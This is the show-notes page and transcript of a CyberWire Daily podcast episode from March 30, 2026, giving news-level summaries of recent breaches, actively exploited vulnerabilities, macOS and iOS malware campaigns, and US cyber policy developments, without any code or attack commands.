Podcasts
CyberWire Daily
Ep 2519
The CyberWire Daily Podcast 3.30.26
Ep 2519 | 3.30.26

Inbox intrusion hits FBI chief.

Show Notes
Transcript

Iran-linked hackers claim a breach of the FBI director’s personal email. ShinyHunters hit the European Commission. F5 and Citrix warn of actively exploited flaws. A WordPress plugin exposes hundreds of thousands of sites. Infinity Stealer targets macOS users. A Russian APT adopts a new iOS exploit kit. Treasury weighs a cyber insurance backstop. DHS clears suspended CISA staff. Our guest is Brian Long, CEO and Co-Founder of Adaptive Security, discussing deepfake job hires and the new identity attack surface. Bureaucrats bless a black-box behemoth.

Today is Monday March 30th 2026. I’m Dave Bittner. And this is your CyberWire Intel Briefing.

Iran-linked hackers claim breach of the FBI director’s personal email.

Iran-linked hackers calling themselves Handala Hack Team claim they breached FBI Director Kash Patel’s personal Gmail account and published photos and more than 300 emails online. The FBI confirmed the account was targeted but said the material was historical and contained no government information. Reuters could not independently verify the emails, though the address matches one previously tied to Patel in earlier breaches.

Handala, widely assessed by Western researchers as a front for Iranian cyberintelligence activity, has recently claimed additional attacks, including against medical device firm Stryker and alleged data exposure involving Lockheed Martin employees. Analysts say the Patel leak fits a broader Iranian strategy to embarrass U.S. officials and signal reach during ongoing tensions with the United States and Israel.

Such intrusions into officials’ personal accounts are not unusual and resemble earlier incidents involving senior U.S. figures. Intelligence assessments suggest Iran may continue low-level cyber operations as part of retaliatory pressure.

ShinyHunters breach the European Commission. 

The European Commission confirmed a data breach affecting its Europa.eu web platform after an attack claimed by the ShinyHunters extortion group. Investigators say at least one Amazon Web Services account tied to the platform was compromised, though internal Commission systems were not affected and public websites remained operational. Officials believe some data was taken and are notifying potentially impacted EU entities while continuing to assess the scope of the incident.

ShinyHunters claims it stole more than 350 GB of data, including databases, mail server content, contracts, and other sensitive files, and has posted a 90 GB archive on its leak site. The Commission has not verified the full extent of these claims but says it is monitoring the situation and strengthening security measures.

F5 Networks highlights an actively exploited vulnerability. 

F5 Networks has upgraded the severity of vulnerability CVE-2025-53521 in its BIG-IP Access Policy Manager (APM) from a denial-of-service flaw to a critical remote code execution (RCE) issue, warning it is actively exploited to deploy webshells on unpatched systems. The bug allows unauthenticated attackers to execute code on affected devices configured with access policies on virtual servers. F5 says earlier patches still address the risk but urges organizations to review logs, disks, and terminal histories for signs of compromise.

The U.S. Cybersecurity and Infrastructure Security Agency added the flaw to its catalog of actively exploited vulnerabilities and ordered federal agencies to secure systems immediately. With more than 240,000 BIG-IP instances exposed online, the vulnerability presents a significant enterprise risk. 

Citrix NetScaler vulnerabilities are under active exploitation. 

Security researchers have confirmed active exploitation of CVE-2026-3055, a critical vulnerability in Citrix NetScaler ADC and NetScaler Gateway that can allow unauthenticated attackers to leak sensitive memory data. The flaw affects only customer-managed systems configured as SAML Identity Providers. Honeypot telemetry from watchTowr and Defused observed attackers sending crafted SAML requests to trigger data exposure. Citrix and agencies including the UK’s National Cyber Security Centre urge immediate patching, warning that exploitation began within days of disclosure and is ongoing in the wild.

A popular Wordpress plugin exposes over 800,000 websites. 

A vulnerability in the Smart Slider 3 WordPress plugin, installed on more than 800,000 websites, allows authenticated users with subscriber-level access to read arbitrary files from affected servers. Tracked as CVE-2026-3098, the flaw stems from missing capability and file validation checks in the plugin’s AJAX export function, enabling access to sensitive files such as wp-config.php, which contains database credentials and cryptographic keys. Although rated medium severity because authentication is required, the issue poses significant risk for sites with user accounts. The bug affects versions through 3.5.1.33 and was patched in version 3.5.1.34. Researchers estimate roughly 500,000 sites may still be vulnerable. No active exploitation has been confirmed, but administrators are urged to update promptly.

Infinity Stealer targets macOS through ClickFix. 

Infinity Stealer is a newly identified macOS information-stealing malware delivered through a fake Cloudflare CAPTCHA using the ClickFix social-engineering technique. Victims are prompted to paste a base64-encoded curl command into Terminal, which installs a Python-based payload compiled into a native macOS binary using the Nuitka compiler. According to Malwarebytes, this marks the first observed campaign combining ClickFix delivery with a Nuitka-compiled macOS infostealer.

Once installed, the malware performs anti-analysis checks and steals browser credentials, macOS Keychain data, cryptocurrency wallets, screenshots, and developer secrets before exfiltrating them to command-and-control infrastructure. Researchers say the native binary format complicates detection and analysis, highlighting increasingly sophisticated threats targeting macOS users.

Researchers say a Russian APT has adopted the DarkSword iOS exploit kit. 

Russian state-linked threat group Star Blizzard has adopted the DarkSword iOS exploit kit in a new campaign targeting Apple devices and iCloud accounts, according to Proofpoint. The activity, observed March 26, used Atlantic Council-themed phishing emails sent from compromised accounts and marked a shift to link-based delivery. Evidence suggests the group is using DarkSword for credential harvesting and intelligence collection. Targets included government, financial, legal, academic, and think tank organizations, indicating expanded operational scope.

The Treasury Department ponders a cyber insurance backstop. 

The U.S. Treasury Department is seeking public comment on whether catastrophic cyber incidents should qualify for coverage under the Terrorism Risk Insurance Program (TRIP), signaling renewed debate over a possible federal cyber insurance backstop. Originally created after 9/11, TRIP supports insurers facing large terrorism-related losses, but cyberattacks remain difficult to classify under the program due to challenges around attribution, intent, and scale.

Officials are examining whether this ambiguity leaves critical infrastructure operators exposed to major cyber disruptions that private insurers may not be able to absorb. Researchers say discussions remain exploratory, with no immediate policy changes expected, even as cyber risks continue to grow.

Experts warn that events such as large cloud outages or attacks on power grids could exceed current insurance limits. Insurers often structure policies to avoid correlated, systemic losses, increasing concern that a severe cyber incident could create economic damage beyond what the private market can cover.

DHS ends its investigation into CISA staff. 

The Department of Homeland Security has ended an investigation into seven Cybersecurity and Infrastructure Security Agency staff members who were placed on leave after arranging a counterintelligence polygraph exam that former acting CISA Director Madhu Gottumukkala failed in July 2025. Officials said the probe was closed about a week ago and the staff were cleared of wrongdoing. At least five career employees and one contractor had their security clearances suspended following their involvement in scheduling or approving the exam, which was required for access to a sensitive intelligence program. Lawmakers on the House Homeland Security Committee welcomed the decision, calling the action a correction after employees were penalized for performing their duties. It remains unclear whether all affected staff will return, and CISA continues to operate without permanent leadership.

Bureaucrats bless a black-box behemoth.

In late 2024, federal cybersecurity reviewers examined Microsoft’s Government Community Cloud High and came away with what might politely be called concerns, and less politely something closer to despair. According to ProPublica, after years of requesting basic documentation about how sensitive data moves and is encrypted inside the system, reviewers still lacked enough visibility to judge its security posture with confidence. Unfortunately for everyone involved, the product was already widely deployed across agencies like Justice and Energy, making rejection awkwardly impractical.

So FedRAMP authorized it anyway, attaching what amounted to a “proceed with caution” label and hoping for the best. The decision followed years of incomplete diagrams, stalled reviews, and mounting pressure from agencies already committed to the platform. Critics now warn the process looks less like rigorous oversight and more like paperwork theater, especially as staffing cuts leave fewer people around to verify what, exactly, was approved in the first place.

And that’s the CyberWire.

For links to all of today’s stories, check out our Daily Briefing at the cyberwire dot com.

 

We’d love to know what you think of this podcast. Your feedback ensures we deliver the insights that keep you a step ahead in the rapidly changing world of cybersecurity. If you like the show, please share a rating and review in your podcast app. Please also fill out the survey in the show notes or send an email to cyberwire@n2k.com

We’re proud that N2K CyberWire is part of the daily routine of the most influential leaders and operators in the public and private sector, from the Fortune 500 to many of the world’s preeminent intelligence and law enforcement agencies.

N2K helps cybersecurity professionals and organizations grow, learn, and stay ahead. We’re the nexus for discovering the people, tech, and ideas shaping the industry.  Learn how at n2k.com.

 

N2K’s lead producer is Liz Stokes. We’re mixed by  Tré Hester, with original music by and sound design Elliott Peltzman. Our contributing host is Maria Varmazis. Our executive producer is Jennifer Eiben. Peter Kilpe is our publisher. And I’m Dave Bittner. Thanks for listening.

CyberWire Daily
Podcast Info
HOST(S):
Dave Bittner
Dave Bittner is a security podcast host and one of the founders at CyberWire. He's a creator, producer, videographer, actor, experimenter, and entrepreneur. He's had a long career in the worlds of television, journalism and media production, and is one of the pioneers of non-linear editing and digital storytelling.
Schedule: Monday-Friday
Creator: N2K Networks, Inc.
ADVERTISEMENT
Sponsored by Adaptive Security
Sponsored by Adaptive Security

Adaptive Security is the leading provider of AI-powered social engineering prevention, protecting against deepfake personas, AI-driven phishing, and multi-channel attacks. With advanced AI simulations, real-time risk assessment, and security awareness training, Adaptive helps organizations proactively defend against emerging cyber threats. Learn more.